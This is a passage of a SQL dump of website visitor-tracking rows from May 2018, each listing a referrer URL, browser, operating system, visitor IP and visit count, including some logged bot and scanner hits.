80.194.32','000',1,0),(30482,'2018-05-15','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.32','000',1,0),(30483,'2018-05-15','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.31','000',1,0),(30484,'2018-05-15','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.27','000',1,0),(30485,'2018-05-15','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.29','000',1,0),(30486,'2018-05-15','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.29','000',1,0),(30487,'2018-05-15','https://zphiblgz.org','Chrome','Macintosh','28.0.1500.71','','72.14.199.190','000',1,0),(30488,'2018-05-15','https://zphiblgz.org','Chrome','Macintosh','28.0.1500.71','','72.14.199.82','000',1,0),(30489,'2018-05-15','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.29','000',1,0),(30490,'2018-05-15','https://www.google.com/','Chrome','Windows','66.0.3359.139','','73.200.187.175','000',2,0),(30491,'2018-05-15','https://zphiblgz.org','Firefox','Windows','7.0.1','','185.220.101.15','000',1,0),(30492,'2018-05-15','https://zphiblgz.org','Chrome','Macintosh','28.0.1500.71','','72.14.199.187','000',1,0),(30493,'2018-05-15','https://zphiblgz.org','Chrome','Macintosh','28.0.1500.71','','72.14.199.84','000',1,0),(30494,'2018-05-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','104.196.140.86','000',2,0),(30495,'2018-05-15','https://www.google.com/','SamsungBrowser','Android','4.0','','100.15.119.232','000',2,0),(30496,'2018-05-16','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.31','000',1,0),(30497,'2018-05-16','https://zphiblgz.org','Firefox','Windows','40.1','','2.81.144.153','000',2,0),(30498,'2018-05-16','https://zphiblgz.org','Firefox','Windows','40.1','','110.54.251.43','000',2,0),(30499,'2018-05-16','https://zphiblgz.org','Firefox','Windows','40.1','','117.199.240.15','000',2,0),(30500,'2018-05-16','https://zphiblgz.org/service/appa/','Chrome','Chrome OS','65.0.3325.209','','69.140.242.93','000',4,0),(30501,'2018-05-16','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.80','000',1,0),(30502,'2018-05-16','https://zphiblgz.org','Chrome','Windows','66.0.3359.139','','198.51.197.174','000',3,0),(30503,'2018-05-16','https://zphiblgz.org/','Chrome','Windows','61.0.3163.100','','146.185.223.202','000',1,0),(30504,'2018-05-16','https://zphiblgz.org','xpymep4','Unknown','Unknown','','146.185.223.202','000',1,0),(30505,'2018-05-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','35.229.31.174','000',4,0),(30506,'2018-05-16','https://zphiblgz.org/event/howard-county-volunteer-year-reception/','AppleWebKit','Windows','534','','40.77.188.140','000',2,0),(30507,'2018-05-16','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',8,0),(30508,'2018-05-16','http://zphiblgz.org/','Opera','Windows','12.16','','195.22.125.122','000',3,0),(30509,'2018-05-16','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',5,0),(30510,'2018-05-16','https://zphiblgz.org','Safari','iPhone','11.0','','174.205.23.227','000',9,0),(30511,'2018-05-16','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.27','000',1,0),(30512,'2018-05-16','https://www.bing.com/','MSIE','Windows','11.0','','204.126.132.241','000',6,0),(30513,'2018-05-16','https://zphiblgz.org','Chrome','Windows','9.0.597.94','','208.80.194.32','000',1,0),(30514,'2018-05-16','https://zphiblgz.org','Safari','iPhone','11.0','','98.117.197.139','000',1,0),(30515,'2018-05-16','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','180.169.191.142','000',2,0),(30516,'2018-05-16','https://zphiblgz.org','Firefox','Windows','29.0','','45.57.163.254','000',2,0),(30517,'2018-05-16','http://zphiblgz.org/','Chrome','Linux','58.0.3029.81','','163.172.4.153','000',1,0),(30518,'2018-05-16','https://zphiblgz.org/','Firefox','Macintosh','53.0','','163.172.4.153','000',1,0),(30519,'2018-05-16','https://zphiblgz.org','Firefox','Windows','40.1','','186.6.74.228','000',2,0),(30520,'2018-05-16','https://zphiblgz.org/','Firefox','Windows','43.0','','31.130.22.178','000',2,0),(30521,'2018-05-16','https://zphiblgz.org','Chrome','Windows','12.0.742.91','','208.80.194.32','000',1,0),(30522,'2018-05-16','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.35','000',1,0),(30523,'2018-05-16','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.35','000',1,0),(30524,'2018-05-16','https://zphiblgz.org/','AppleWebKit','Windows','534','','40.77.188.20','000',1,0),(30525,'2018-05-16','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.31','000',2,0),(30526,'2018-05-17','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.210.126','000',2,0),(30527,'2018-05-17','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',4,0),(30528,'2018-05-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','213.251.182.111','000',1,0),(30529,'2018-05-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','67.205.10.101','000',1,0),(30530,'2018-05-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','198.24.179.74','000',1,0),(30531,'2018-05-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','80.88.86.23','000',1,0),(30532,'2018-05-17','https://zphiblgz.org','Chrome','Windows','12.0.742.91','','208.80.194.35','000',1,0),(30533,'2018-05-17','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.94.182.184','000',2,0),(30534,'2018-05-17','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.212.67','000',2,0),(30535,'2018-05-17','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.94.180.230','000',2,0),(30536,'2018-05-17','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.216.149','000',2,0),(30537,'2018-05-17','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.94.190.187','000',1,0),(30538,'2018-05-17','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.94.178.148','000',2,0),(30539,'2018-05-17','http://zphiblgz.org/tag/money/','Firefox','Windows','44.0','','176.31.208.220','000',2,0),(30540,'2018-05-17','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.210.81','000',2,0),(30541,'2018-05-17','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.80','000',1,0),(30542,'2018-05-17','http://zphiblgz.org/','Opera Next','Windows','40.6.1114.6486','','5.101.40.96','000',1,0),(30543,'2018-05-17','https://zphiblgz.org','Firefox','Windows','40.1','','103.194.218.207','000',2,0),(30544,'2018-05-17','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.32','000',1,0),(30545,'2018-05-17','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.32','000',1,0),(30546,'2018-05-17','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.94.186.47','000',2,0),(30547,'2018-05-17','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.210.230','000',2,0),(30548,'2018-05-17','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.212.107','000',2,0),(30549,'2018-05-17','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.56.232.243','000',2,0),(30550,'2018-05-17','https://zphiblgz.org/','Chrome','Windows','66.0.3359.139','','198.51.197.174','000',1,0),(30551,'2018-05-17','http://avtovykup.kz/','MSIE','Windows','6.0','','5.248.199.158','000',3,0),(30552,'2018-05-17','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.94.178.145','000',1,0),(30553,'2018-05-17','https://www.google.com/','Chrome','Windows','66.0.3359.181','','72.81.131.145','000',11,0),(30554,'2018-05-17','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.214.106','000',2,0),(30555,'2018-05-17','https://www.google.com/','Chrome','Windows','66.0.3359.181','','167.102.188.126','000',7,0),(30556,'2018-05-17','https://www.google.com/','Chrome','Windows','66.0.3359.139','','146.245.132.107','000',6,0),(30557,'2018-05-17','https://zphiblgz.org','Chrome','Windows','40.0.2214.85','','138.246.253.19','000',1,0),(30558,'2018-05-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','120.79.171.34','000',2,0),(30559,'2018-05-17','https://www.google.com/','Chrome','Windows','66.0.3359.181','','131.171.200.2','000',2,0),(30560,'2018-05-17','https://www.google.com/','Chrome','Windows','66.0.3359.139','','216.194.43.62','000',2,0),(30561,'2018-05-17','https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwitjfjtro3bAhWD2VMKHTFNDLcQFggnMAA&url=https%3A%2F%2Fzphiblgz.org%2Fscholarship%2Frecommendation%2F&usg=AOvVaw31mHL4CN8h5PiqoZdsytoG','MSIE','Windows','11.0','','69.60.33.192','000',2,0),(30562,'2018-05-17','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',4,0),(30563,'2018-05-17','http://zphiblgz.org/scholarship/application/','AppleWebKit','Windows','534','','40.77.190.12','000',1,0),(30564,'2018-05-17','https://zphiblgz.org','Firefox','Windows','57.0','','195.154.50.91','000',2,0),(30565,'2018-05-17','https://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.63.43','000',1,0),(30566,'2018-05-17','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.220.172','000',2,0),(30567,'2018-05-17','https://zphiblgz.org','Firefox','Windows','40.1','','113.203.175.28','000',2,0),(30568,'2018-05-17','https://zphiblgz.org','Chrome','Macintosh','40.0.2214.93','','54.219.128.91','000',2,0),(30569,'2018-05-17','https://zphiblgz.org','Chrome','Macintosh','50.0.2661.102','','54.215.194.144','000',32,0),(30570,'2018-05-17','https://zphiblgz.org','Chrome','Linux','63.0.3205.0','','18.144.43.229','000',3,0),(30571,'2018-05-17','https://zphiblgz.org','Opera Next','Windows','36.0.2130.32','','77.243.191.20','000',1,0),(30572,'2018-05-17','https://zphiblgz.org','Chrome','Linux','66.0.3359.139','','137.226.13.23','000',3,0),(30573,'2018-05-17','https://zphiblgz.org/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','Safari','iPhone','7.0','','40.77.188.163','000',1,0),(30574,'2018-05-17','https://zphiblgz.org','Safari','iPhone','7.0','','199.30.24.31','000',1,0),(30575,'2018-05-17','https://zphiblgz.org','Firefox','Windows','40.1','','172.56.27.154','000',2,0),(30576,'2018-05-17','https://zphiblgz.org','Chrome','Linux','66.0.3359.139','','137.226.12.177','000',3,0),(30577,'2018-05-18','http://zphiblgz.org/scholarship/','Safari','iPhone','7.0','','40.77.178.90','000',1,0),(30578,'2018-05-18','http://zphiblgz.org/wp-content/plugins/fluid_forms/file-upload/server/php/','Chrome','Windows','42.0.2311.152','','193.201.224.210','000',1,0),(30579,'2018-05-18','http://zphiblgz.org/','MSIE','Windows','6.0','','156.196.184.84','000',2,0),(30580,'2018-05-18','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.102.6.96','000',1,0),(30581,'2018-05-18','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.102.6.104','000',1,0),(30582,'2018-05-18','https://zphiblgz.org','Firefox','Windows','40.1','','117.204.241.96','000',2,0),(30583,'2018-05-18','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',12,0),(30584,'2018-05-18','https://zphiblgz.org','Firefox','Windows','7.0.1','','207.244.70.35','000',1,0),(30585,'2018-05-18','https://zphiblgz.org','Safari','Macintosh','11.0.3','','5.9.17.118','000',1,0),(30586,'2018-05-18','https://zphiblgz.org/','Chrome','Windows','66.0.3359.139','','198.51.197.174','000',1,0),(30587,'2018-05-18','https://www.google.com/','Safari','iPhone','11.0','','50.232.32.202','000',4,0),(30588,'2018-05-18','https://zphiblgz.org/','Firefox','Windows','44.0','','62.122.95.134','000',2,0),(30589,'2018-05-18','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',4,0),(30590,'2018-05-18','https://zphiblgz.org','Chrome','iPhone','66.0.3359.122','','166.137.240.55','000',1,0),(30591,'2018-05-18','https://zphiblgz.org','Chrome','iPhone','66.0.3359.122','','107.77.202.22','000',2,0),(30592,'2018-05-18','https://zphiblgz.org','Chrome','Macintosh','62.0.3202.94','','52.173.241.248','000',1,0),(30593,'2018-05-18','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','123.30.235.19','000',1,0),(30594,'2018-05-18','https://zphiblgz.org','Firefox','Macintosh','59.0','','64.246.165.180','000',2,0),(30595,'2018-05-18','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.30','000',2,0),(30596,'2018-05-18','https://zphiblgz.org/','Firefox','Windows','52.0','','200.84.102.166','000',1,0),(30597,'2018-05-18','https://zphiblgz.org/wp-comments-post.php','Firefox','Windows','52.0','','191.7.194.54','000',1,0),(30598,'2018-05-18','https://zphiblgz.org','MSIE','Windows','9.0','','192.198.80.227','000',1,0),(30599,'2018-05-18','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.27','000',1,0),(30600,'2018-05-18','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.27','000',1,0),(30601,'2018-05-18','https://zphiblgz.org','Chrome','Linux','47.0.2526.35','','212.83.187.106','000',1,0),(30602,'2018-05-18','https://zphiblgz.org','Firefox','Windows','59.0','','34.224.148.94','000',4,0),(30603,'2018-05-18','https://zphiblgz.org','Python-urllib','Unknown','2.7','','104.168.151.28','000',1,0),(30604,'2018-05-18','https://zphiblgz.org','Lynx','Unknown','2.8.9dev.8','','51.15.35.25','000',2,0),(30605,'2018-05-18','https://zphiblgz.org','Firefox','Windows','40.1','','83.196.61.147','000',2,0),(30606,'2018-05-19','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.32','000',1,0),(30607,'2018-05-19','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.27','000',1,0),(30608,'2018-05-19','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.27','000',1,0),(30609,'2018-05-19','https://zphiblgz.org','Chrome','Windows','16.0.912.63','','208.80.194.27','000',1,0),(30610,'2018-05-19','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.27','000',1,0),(30611,'2018-05-19','http://www.zphiblgz.org','Chrome','Linux','65.0.3325.181','','104.236.63.51','000',2,0),(30612,'2018-05-19','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',10,0),(30613,'2018-05-19','https://zphiblgz.org','Firefox','Windows','34.0','','193.106.30.99','000',1,0),(30614,'2018-05-19','https://zphiblgz.org','Chrome','Windows','40.0.2214.85','','138.246.253.5','000',2,0),(30615,'2018-05-19','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.179.252','000',1,0),(30616,'2018-05-19','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','192.198.80.227','000',2,0),(30617,'2018-05-19','https://zphiblgz.org','python-requests','Unknown','2.9.1','','188.166.34.95','000',2,0),(30618,'2018-05-19','https://zphiblgz.org/','Chrome','Windows','66.0.3359.139','','198.51.197.174','000',1,0),(30619,'2018-05-19','https://www.google.com/','Chrome','Android','63.0.3239.83','','174.205.16.149','000',4,0),(30620,'2018-05-19','https://zphiblgz.org','Edge','Windows','16.16299','','166.137.244.123','000',1,0),(30621,'2018-05-19','https://zphiblgz.org','Edge','Windows','16.16299','','107.77.204.173','000',2,0),(30622,'2018-05-19','https://zphiblgz.org','Firefox','Macintosh','60.0','','192.12.13.14','000',2,0),(30623,'2018-05-19','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.215.254.26','000',2,0),(30624,'2018-05-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','137.226.113.28','000',2,0),(30625,'2018-05-19','https://zphiblgz.org','Chrome','Windows','66.0.3359.117','','184.154.189.90','000',2,0),(30626,'2018-05-19','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',4,0),(30627,'2018-05-19','https://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',1,0),(30628,'2018-05-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','35.185.55.94','000',4,0),(30629,'2018-05-19','https://zphiblgz.org','Chrome','Windows','66.0.3359.117','','107.6.150.242','000',2,0),(30630,'2018-05-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','158.69.117.141','000',8,0),(30631,'2018-05-19','https://zphiblgz.org','Chrome','Android','45.0.2454.94','','158.69.117.141','000',1,0),(30632,'2018-05-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','137.226.113.26','000',3,0),(30633,'2018-05-19','http://m.facebook.com/','Chrome','Android','66.0.3359.158','','68.134.22.73','000',3,0),(30634,'2018-05-19','http://zphiblgz.org/','Firefox','Windows','52.45.92','','45.227.253.251','000',2,0),(30635,'2018-05-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','47.96.233.90','000',2,0),(30636,'2018-05-19','https://zphiblgz.org','Firefox','Windows','40.1','','195.189.11.190','000',2,0),(30637,'2018-05-19','https://zphiblgz.org','Firefox','Windows','7.0.1','','178.17.174.198','000',1,0),(30638,'2018-05-19','https://zphiblgz.org','Chrome','Linux','11.0.696.3','','5.39.85.81','000',2,0),(30639,'2018-05-20','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',10,0),(30640,'2018-05-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','35.205.150.78','000',4,0),(30641,'2018-05-20','https://zphiblgz.org','Python-urllib','Unknown','2.7','','104.168.151.28','000',1,0),(30642,'2018-05-20','https://zphiblgz.org','Firefox','Windows','57.0','','192.198.80.227','000',1,0),(30643,'2018-05-20','https://zphiblgz.org/','Chrome','Windows','63.0.3239.84','','45.76.168.62','000',3,0),(30644,'2018-05-20','http://zphiblgz.org/tag/money/','Firefox','Windows','44.1','','188.165.229.75','000',2,0),(30645,'2018-05-20','https://zphiblgz.org','Firefox','Linux','52.0','','91.121.85.140','000',2,0),(30646,'2018-05-20','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','192.95.30.29','000',4,0),(30647,'2018-05-20','https://zphiblgz.org/service/','AppleWebKit','Windows','534','','40.77.189.132','000',1,0),(30648,'2018-05-20','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.190.240','000',1,0),(30649,'2018-05-20','https://zphiblgz.org/','Chrome','Windows','66.0.3359.139','','198.51.197.174','000',1,0),(30650,'2018-05-20','https://www.google.com/','Chrome','Windows','63.0.3239.132','','64.29.240.12','000',4,0),(30651,'2018-05-20','http://zphiblgz.org/scholarship/','Safari','iPhone','7.0','','199.30.25.27','000',1,0),(30652,'2018-05-20','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',4,0),(30653,'2018-05-20','https://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.186','000',1,0),(30654,'2018-05-20','https://zphiblgz.org','Firefox','Windows','40.1','','178.223.144.114','000',2,0),(30655,'2018-05-20','http://zphiblgz.org/tag/money/','Firefox','Windows','42.0','','176.31.208.220','000',2,0),(30656,'2018-05-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','178.162.214.71','000',1,0),(30657,'2018-05-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','184.168.27.71','000',1,0),(30658,'2018-05-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','213.251.182.110','000',1,0),(30659,'2018-05-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','132.148.104.136','000',1,0),(30660,'2018-05-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','50.28.49.55','000',1,0),(30661,'2018-05-20','https://zphiblgz.org','python-requests','Unknown','2.18.4','','209.150.108.10','000',1,0),(30662,'2018-05-20','https://zphiblgz.org','Firefox','Linux','50.0','','137.226.113.22','000',2,0),(30663,'2018-05-20','https://zphiblgz.org','Chrome','Windows','34.0.1847.131','','173.244.48.83','000',1,0),(30664,'2018-05-20','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.29','000',1,0),(30665,'2018-05-20','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.29','000',1,0),(30666,'2018-05-20','https://www.google.com/','Chrome','Android','66.0.3359.158','','96.244.220.49','000',19,0),(30667,'2018-05-20','http://m.facebook.com','AppleWebKit','iPhone','605.1.15','','100.16.219.197','000',2,0),(30668,'2018-05-20','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.31','000',1,0),(30669,'2018-05-20','https://zphiblgz.org','Firefox','Windows','4.0.1','','208.80.194.27','000',1,0),(30670,'2018-05-20','https://www.google.com/','Safari','Macintosh','11.1','','99.120.120.93','000',4,0),(30671,'2018-05-20','https://zphiblgz.org','Chrome','Windows','66.0.3359.117','','107.6.150.244','000',1,0),(30672,'2018-05-21','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.28','000',1,0),(30673,'2018-05-21','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.28','000',1,0),(30674,'2018-05-21','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.28','000',1,0),(30675,'2018-05-21','https://www.google.com/','Safari','iPhone','11.0','','73.36.228.241','000',6,0),(30676,'2018-05-21','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.28','000',1,0),(30677,'2018-05-21','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',12,0),(30678,'2018-05-21','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','188.165.208.29','000',26,0),(30679,'2018-05-21','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.188.42','000',1,0),(30680,'2018-05-21','https://zphiblgz.org','Firefox','Macintosh','49.0','','91.147.229.139','000',2,0),(30681,'2018-05-21','https://zphiblgz.org','Firefox','Windows','40.1','','177.228.87.249','000',2,0),(30682,'2018-05-21','https://www.google.com/','Chrome','Windows','66.0.3359.181','','96.244.96.210','000',5,0),(30683,'2018-05-21','https://zphiblgz.org','Chrome','Macintosh','62.0.3202.94','','52.173.241.248','000',1,0),(30684,'2018-05-21','https://zphiblgz.org','Chrome','Windows','66.0.3359.117','','198.143.155.138','000',1,0),(30685,'2018-05-21','https://www.zphiblgz.org:443/','Chrome','Windows','66.0.3359.117','','198.143.155.142','000',1,0),(30686,'2018-05-21','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.56.232.243','000',2,0),(30687,'2018-05-21','https://zphiblgz.org','Opera Next','Windows','36.0.2130.32','','212.92.121.247','000',1,0),(30688,'2018-05-21','https://zphiblgz.org/','Chrome','Windows','66.0.3359.139','','198.51.197.174','000',2,0),(30689,'2018-05-21','https://zphiblgz.org','Firefox','Windows','40.1','','103.86.182.216','000',2,0),(30690,'2018-05-21','https://zphiblgz.org','Firefox','Windows','4.0.1','','208.80.194.29','000',1,0),(30691,'2018-05-21','https://zphiblgz.org','Firefox','Windows','40.1','','222.178.10.230','000',2,0),(30692,'2018-05-21','https://zphiblgz.org','MSIE','Windows','11.0','','18.233.223.113','000',2,0),(30693,'2018-05-21','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.35','000',1,0),(30694,'2018-05-21','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.35','000',1,0),(30695,'2018-05-21','https://www.google.com/','Safari','iPhone','11.0','','174.204.5.87','000',2,0),(30696,'2018-05-21','https://zphiblgz.org','python-requests','Unknown','2.18.4','','185.7.214.55','000',16,0),(30697,'2018-05-21','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.29','000',1,0),(30698,'2018-05-21','https://zphiblgz.org','Firefox','Windows','36.0','','185.7.214.55','000',2,0),(30699,'2018-05-21','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',3,0),(30700,'2018-05-21','https://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',1,0),(30701,'2018-05-21','https://www.google.com/','Chrome','Windows','66.0.3359.181','','96.5.110.39','000',2,0),(30702,'2018-05-21','http://zphiblgz.org/wp-content/plugins/fluid_forms/file-upload/server/php/','Chrome','Windows','42.0.2311.152','','193.201.224.210','000',1,0),(30703,'2018-05-21','http://zphiblgz.org/tag/money/','Firefox','Windows','40.1','','188.165.229.75','000',2,0),(30704,'2018-05-21','http://zphiblgz.org/','Chrome','Macintosh','57.0.2987.133','','163.172.4.153','000',1,0),(30705,'2018-05-21','https://zphiblgz.org/','Firefox','Linux','52.0','','163.172.4.153','000',1,0),(30706,'2018-05-21','https://zphiblgz.org','Chrome','Macintosh','65.0.3325.181','','52.165.148.51','000',1,0),(30707,'2018-05-21','https://www.google.com/','Chrome','Windows','66.0.3359.181','','207.141.171.234','000',2,0),(30708,'2018-05-21','https://zphiblgz.org','Edge','Windows','16.16299','','52.165.148.51','000',1,0),(30709,'2018-05-21','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.29','000',1,0),(30710,'2018-05-21','https://www.google.com/','Safari','iPhone','11.0','','71.121.244.120','000',2,0),(30711,'2018-05-21','https://zphiblgz.org/scholarship/','Safari','iPhone','7.0','','131.253.27.87','000',1,0),(30712,'2018-05-21','https://www.google.com/','Chrome','Windows','66.0.3359.181','','119.92.251.197','000',1,0),(30713,'2018-05-21','https://www.google.com/','Chrome','Windows','66.0.3359.181','','73.129.21.43','000',4,0),(30714,'2018-05-21','https://zphiblgz.org','Chrome','Windows','16.0.912.63','','208.80.194.31','000',1,0),(30715,'2018-05-21','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.31','000',1,0),(30716,'2018-05-21','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.35','000',1,0),(30717,'2018-05-21','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.31','000',1,0),(30718,'2018-05-21','https://zphiblgz.org','Firefox','Windows','4.0.1','','208.80.194.31','000',1,0),(30719,'2018-05-21','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.215.254.26','000',2,0),(30720,'2018-05-21','https://www.google.com/','Chrome','Windows','66.0.3359.181','','173.29.252.8','000',12,0),(30721,'2018-05-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','158.69.225.33','000',12,0),(30722,'2018-05-21','https://zphiblgz.org','Chrome','Android','45.0.2454.94','','158.69.225.33','000',1,0),(30723,'2018-05-22','https://zphiblgz.org/','Chrome','Windows','55.0.2883.87','','137.74.132.80','000',2,0),(30724,'2018-05-22','https://zphiblgz.org','Firefox','Windows','40.1','','23.240.114.228','000',2,0),(30725,'2018-05-22','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','45.76.128.22','000',2,0),(30726,'2018-05-22','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',4,0),(30727,'2018-05-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','35.231.143.197','000',4,0),(30728,'2018-05-22','https://zphiblgz.org','Firefox','Windows','7.0.1','','62.210.129.246','000',1,0),(30729,'2018-05-22','https://zphiblgz.org','python-requests','Unknown','2.18.4','','104.244.76.187','000',11,0),(30730,'2018-05-22','https://zphiblgz.org','Firefox','Windows','36.0','','104.244.76.187','000',1,0),(30731,'2018-05-22','http://zphiblgz.org/admin.php','Opera Next','Windows','49.0.2711.0','','194.28.115.251','000',1,0),(30732,'2018-05-22','https://zphiblgz.org','Firefox','Windows','40.1','','79.152.95.174','000',2,0),(30733,'2018-05-22','https://zphiblgz.org','Firefox','Windows','40.1','','49.144.199.60','000',2,0),(30734,'2018-05-22','http://sovetogorod.ru/frukt_spisok.html','MSIE','Windows','6.0','','178.137.86.85','000',3,0),(30735,'2018-05-22','https://zphiblgz.org','Unknown','Unknown','Unknown','','107.172.5.175','000',1,0),(30736,'2018-05-22','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.32','000',1,0),(30737,'2018-05-22','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.30','000',1,0),(30738,'2018-05-22','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.30','000',1,0),(30739,'2018-05-22','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.31','000',1,0),(30740,'2018-05-22','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.29','000',1,0),(30741,'2018-05-22','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.29','000',1,0),(30742,'2018-05-22','https://zphiblgz.org','Chrome','Windows','9.0.597.94','','208.80.194.32','000',1,0),(30743,'2018-05-22','https://zphiblgz.org/service/','Safari','iPhone','7.0','','40.77.190.8','000',1,0),(30744,'2018-05-22','https://zphiblgz.org','Go--client','Unknown','1.1','','173.212.228.153','000',1,0),(30745,'2018-05-22','http://zphiblgz.org','Go--client','Unknown','2.0','','173.212.228.153','000',1,0),(30746,'2018-05-22','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.30','000',1,0),(30747,'2018-05-22','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.29','000',1,0),(30748,'2018-05-22','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.29','000',1,0),(30749,'2018-05-22','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',4,0),(30750,'2018-05-22','https://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',1,0),(30751,'2018-05-22','https://www.google.com/','Safari','iPhone','11.0','','69.243.16.36','000',2,0),(30752,'2018-05-22','https://zphiblgz.org','Safari'